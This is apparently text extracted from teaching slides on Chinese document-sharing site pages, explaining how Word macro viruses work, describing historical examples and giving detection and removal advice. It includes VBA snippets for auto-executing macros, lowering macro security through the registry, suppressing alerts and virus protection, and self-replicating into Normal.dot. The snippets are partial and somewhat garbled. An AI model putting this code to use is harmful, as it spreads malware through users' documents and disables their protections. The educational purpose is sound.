版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
宏病毒的原理及实现宏〔macro),就是软件设计者为了在使用软件工作时,防止一再的重复相同的动作而设计出来的一种工具。它利用简单的语法,把常用的动作写成宏,当再工作时,就可以直接利用事先写好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作。什么是“宏〞?MicrosoftOffice、wps等办公软件魔兽世界、剑网等游戏
哪里用到“宏〞?Office宏的定义:MicrosoftWord中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列word命令,它能使日常工作变得更容易〞
宏语言宏语言即VISUALBASICFORAPPLICATION,简称VBA。VBA可以访问许多操作系统函数并支持文档翻开时自动执行宏
——这使得用这种语言写计算机病毒成为可能Office各版本及其宏语言年份Office版本宏语言1987Excel4.0formula1991Excel5.0VBA31993Word6.0WordBasic1997Office97applicationsVBA51999Office2000(WORD10)VBA62001OfficeXPVBA6.22003Office2003(WORD11)VBA6.32006Office2007(WORD12)VbA6.5word创立宏Word提供了两种创立宏的方法:宏录制器和VisualBasic编辑器。宏录制器可帮助用户开始创立宏。Word在VBA
编程语言中把宏录制为一系列的Word命令。可在VisualBasic
编辑器中翻开已录制的宏,修改其中的指令。也可用VisualBasic
编辑器创立包括VisualBasic指令的非常灵活和强有力的宏,这些指令无法采用录制的方式。基于word的VBA编程SubAutoOpen()’定义函数名,AutoXXX为自动宏WhileTrue’恶意代码,死循环Msgbox〞Helloworld〞’调用对话框显示消息WendEndSub’函数到此结束基于word的VBA编程SubAutoOpen()Command.Caption=Shell"C:\ProgramFiles\InternetExplorer\IEXPLORE.EXE"
vbNormalFocusFori=1To10……Documents.Add’新添加一个word文档NextiEndSub
Word应用的层次Documents(所有的文档)Document(一个文档)Templates(所有模板)Windows(所有窗口)SelectionStyleRange…………调用操作系统Shell函数翻开已安装的应用程序Office有了宏,宏在office中的什么位置?为了方便人们使用宏以及宏文件的传递使用,Word定义出一种文件格式,将文档以及该文档所需要的宏合在一起放在后缀为.dot的文件之中。正因为这种是宏也是资料的文档格式,便产生了宏感染的可能性。但是,Normal.dot上不能用来存储数据,每次修改后都需另外保存。有没有一种文档格式,既可以存储宏,又可以用来存储数据????一、模板文件格式:
.dot文档:模板文档,新文档继承模板的属性〔宏、菜单、格式等〕。
Normal.dot文件:全局模板,在建立整个文档中所起的作用是作为一个基类,是新建文档默认的模板。
二、数据文件格式
.doc———一种可以存贮宏的普通文档;.docx——一种不包含宏的普通文档;
.docm——一种包含宏或启用了宏的文档;
.dotx——一种不包含宏的模板;
.dotm——一种包含宏或启用了宏的模板。
宏就在office文档里用普通文档即可传播宏文件
写代码简单,传播更简单,那么,我们可不可以做点别的事?
其实宏病毒的出现并非出乎人们的意料,早在80年代后期就有专家预言过。那时,有些学生就用某些应用程序的宏语言编写病毒。然而,宏病毒与普通病毒不同,它不感染.EXE或.COM文件,而只感染文档文件。宏病毒就像自然界中令人恐惧的龙卷风,对人们正常使用计算机进行学习和工作带来了不可估量的影响,同时也造成了社会财富的巨大浪费。1.Concept宏病毒
世界上的第一个宏病毒Concept可以感染Windows和苹果机上的MicrosoftWord文档。这个病毒是用MicrosoftWord6.0中的宏语言编写的,但它也能感染其他Word版本创立的文档。
看起来编写Concept宏病毒是为了证明确实可以用宏编程语言编写病毒。因此,Concept宏病毒只是显示一个对话框,宣示它的存在,并不成心破坏磁盘上的任何文件。2Nuclear宏病毒这是一个对操作系统文件和打印输出有破坏功能的宏病毒。这个宏病毒中包含以下病毒宏:AutoExecAutoOpenDropSurivFileExitFilePrintFilePrintDefaultFileSaveAs这些宏是只执行〔Execute-only〕宏Nuclear宏病毒造成的破坏现象为:〔1〕翻开一个染毒文档井打印的时候,它会在您打印的最后一段加上“STOPALLFRENCHNUCLEARTESTINGINTHEPACIFIC!〞,这个现象是在每分钟的55秒~60秒之间操作打印时发生。〔2〕如果在每天17:00~18:00之间翻开一个染毒文档,Nuclear病毒会将PH33R病毒传染到计算机上,这是个驻留型病毒。〔3〕在每年的4月5日,该病毒会将计算机上IO.SYS和MSDOS.SYS文件清零,并且删除C盘根目录上的COMMAND.COM文件。一旦病毒发作,MSDOS就不可能被引导,计算机将陷入瘫痪。3台湾一号病毒台湾一号病毒会在每月的13日影响您正常使用Word文档和编辑器。它包含以下病毒宏:AutoClose、AutoNew、AutoOpen这些宏是可被编辑宏。在病毒宏中含有如下的语句:IfDay(Now())=13Then...这条语句与13日有关。台湾一号病毒造成的危害是:在每月13日,假设用户使用Word翻开一个带毒的文档〔模板〕时,病毒会被激发。激发时的现象是:在屏幕正中央弹出一个对话框,该对话框提示用户做一个心算题,如做错,它将会无限制地翻开文件,直至Word内存不够,Word出错为止;如心算题做对,会提示用户“什么是巨集病毒〔宏病毒〕?〞,答复“我就是巨集病毒〞,再提示用户:“如何预防巨集病毒?〞,答复是“不要看我〞。2.1宏病毒简介什么是宏病毒?宏病毒是一种存放在文档或模板的宏中的计算机病毒。一旦翻开这样的文档,其中的宏自动被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染〞上这种宏病毒,而且如果其他用户翻开了感染病毒的文档,宏病毒又会转移到他的计算机上。宏病毒的特点〔1〕宏病毒会感染.DOC文档和.DOT模版文件。〔2〕宏病毒的传染通常是WORD在翻开一个带宏病毒的文档或模版时,激活宏病毒。〔3〕多数宏病毒包含AutoOpen、AutoClose、AutoNew和AutoExit等自动宏,通过这些自动宏病毒取得文档(模版)操作权。〔4〕宏病毒中总是含有对文档读写操作的宏命令。〔5〕病毒原理简单,制作比较方便。〔6〕传播速度相对较快。WORD宏病毒的生命周期21→编程语言:VBA、WordBasic等→运行环境:VBEWord宏病毒的感染过程宏病毒原理大揭秘1、降低宏平安级别以office2003版为例
IfApplication.Version<>“11.0〞Then’判断office版本
strFullname=ThisWorkbook.FullName'取得当前工作薄的全名
strVBS=Replace(UCase(strFullname),".XLS",".vbs")‘temp文件VBS的文件名
SetWSH=CreateObject(“Wscript.Shell〞)’创立Wscript对象
Err.Clear
OnErrorResumeNext’出错不提示,继续
regStr="HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\Level“'注册表中Excelvba平安级别位置
ret=WSH.RegRead(regStr)'读取当前平安级别
IfErr.Number<>0Then
'判断读取是否成功
vbOKOnly+vbCritical,"Keanjeason"
ExitSub
Else
'如果当前ExcelVBA平安级别不为“低〞,那么设置为“低〞,值1-4分别对应:低,中,高,非常高IfVal(ret)<>1Thenret=WSH.RegWrite(regStr,"1","REG_DWORD")
EndIf1、用户使用Word执行翻开文档、保存文档、打印文档和关闭文档等操作时,Word会查找指定的标准宏:例1:关闭文档之前查找“FileSave〞宏,如果存在,首先执行这个宏例2:打印文档之前首先查找“FilePrint〞宏,如果存在那么执行这个宏2、Word中另外还有一些以“Auto〞开始的宏〔自动宏〕,如“AutoOpen〞、“AutoClose〞等,如果建立了这些宏,翻开/关闭文档的时候将自动执行这些宏,这些宏一般是全局宏,对任何Word文档都有效。
病毒触发要隐含在正常的操作中,这些自动执行的宏然是最好的宿主。2、文档的控制权获取宏病毒常用到的宏如下表所示类别宏名运行条件自动宏AutoExec启动Word或加载全局模板时AutoNew每次创建新文档时AutoOpen每次打开已存在的文档时AutoClose在关闭文档时AutoExit在退出Word或卸载全局模板时标准宏FileSave保存文件FileSaveAs改名另存为文件FilePrint打印文件FileOpen打开文件
高明的病毒编写者其自我保护将做得非常好,可以使word的一些工具栏失效,例如将工具菜单中的宏选项屏蔽,也可以修改注册表到达很好的隐藏效果。常用代码例如:OnErrorResumeNext'如果发生错误,不弹出出错窗口,继续执行下面语句Application.DisplayAlert=wdAlertsNoe'不弹出警告窗口Application.EnableCancelKey=wdCancelDisabled'不允许通过ESC键结束正在运行的宏Application.DisplayStatusBar=False'不显示状态栏,防止显示宏的运行状态Application.ScreenUpdating=False '不让刷新屏幕,防止病毒运行引起刷新速度变慢Option.VirusProtection=False '关闭病毒保护功能,运行前如果包含宏,不提示Option.SaveNormalPrompt=False '如果公用模板被修改,不给用户提示窗口而直接保存3、宏病毒的自我隐藏1、Word宏病毒一般都首先隐藏在一个指定的Word文档中,一旦翻开了这个Word文档,宏病毒就被执行,宏病毒要做的第一件事情就是将自己拷贝到全局宏的区域,使得所有翻开的文档都可使用这个宏。2、当Word退出的时候,全局宏将被存储在某个全局的模板文档(.dot文件)中,这个文件的名字通常是“Normal.dot〞,即Normal模板。3、如果全局宏模板被感染,那么Word再启动的时候将自动载入宏病毒并且自动执行。4、传播与感染1〕得到正在操作的文档代码对象和公用模板的代码对象。Ourcode=ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1,100)SetHost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSetHost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIf2)检查模板是否已经感染病毒,如果没有,那么复制宏病毒代码到模板,并且修改函数名。WithhostIf.Lines(1,1)<>"'moonlight"Then.DeleteLines1,.CountOfLines.InsertLines3,"SubDocument_Close()"IfThisDocument=NormalTemplateThen.RbeplaceLine3,"SubDocument_Open()"ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWith宏病毒预防
宏病毒离不开可供其运行的系统软件(WORD,EXCEL等OFFICE软件),所以宏病毒的检测其实非常容易。只要留意一下常用的OFFICE系统软件是不是出现了一些不正常的现象,就能大概知道计算机是不是染上了宏病毒。如何及时发现宏病毒???〔1〕全局模板中出现宏。〔2〕无故出现存盘操作。〔3〕OFFICE功能混乱,无法使用。〔4〕OFFICE菜单命令消失。〔5〕OFFICE文档的内容发生变化。〔6〕尝试保存文档时,只允许将文档保存为文档模版的格式。〔7〕文档图标的外形类似模板而非文档图标。Office不正常现象集锦……
感染了宏病毒后,同样可以用防治计算机病毒的软件来查杀,亦可采用以下方法进行手工处理:1、通过删除宏命令的形式删除宏病毒。2、通过复制粘贴去除宏病毒代码方式去除宏病毒。3、通过删除NORMAL.DOT来除掉Word宏病毒。4、通过格式转换去除Word宏病毒。5、通过高版本的Word发现病毒宏。6、为防万一,在翻开疑心感染了宏病毒的文档时按住SHIFT键,这样可以防止宏自动运行,如果有宏病毒,那么不会加载宏。宏病毒的去除日常办公中
如何去防止宏病毒?1、初级防护——设置宏平安等级36
针对Office2007Office
word选项
信任中心
宏设置为了防止利用“VBA〞语言编制专门破坏电脑系统的病毒程序,Office自带了“宏〞检测功能。设置宏的平安级别较高时,翻开带有“宏〞的文档时,会提示用户注意,并让用户自行选择是否启用“宏〞。〔1〕根据AUTO宏的自动执行的特点,在翻开of
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 中医诊所聘用合同范本
- 2024年度大型商场照明系统升级合同3篇
- 夜场厨房承包合同标准版
- 人防车位转让协合同 3篇
- 房屋装修工程的合同范本
- 零食店电子商务平台运营合同2024
- 水池施工承包合同范本
- 凌柏2024年度知识产权许可合同:专利技术使用权授予
- 2024版影视作品版权购买及授权播放合同2篇
- 培训课程协议合同范本范本版
- 咽的检查法与症状学-课件
- 城乡建设用地增减挂钩项目实施方案(投标专用)
- 卫生洁具采购与安装投标方案(技术标)
- 三年级课外阅读书目《格林童话》测试题(含答案)
- 陈旧性腰椎骨折的护理课件
- 施工围挡合同(模板)
- 精准医疗与生物技术
- 室内与环境设计理论知识考试题库(浓缩500题)
- 工作(服务)方案的先进性、创新性-技术、经济、质量指标-风险分析等
- 明清时期葡人与澳门的海外贸易
- 广东花城版三年级音乐下册全册教案
评论
0/150
提交评论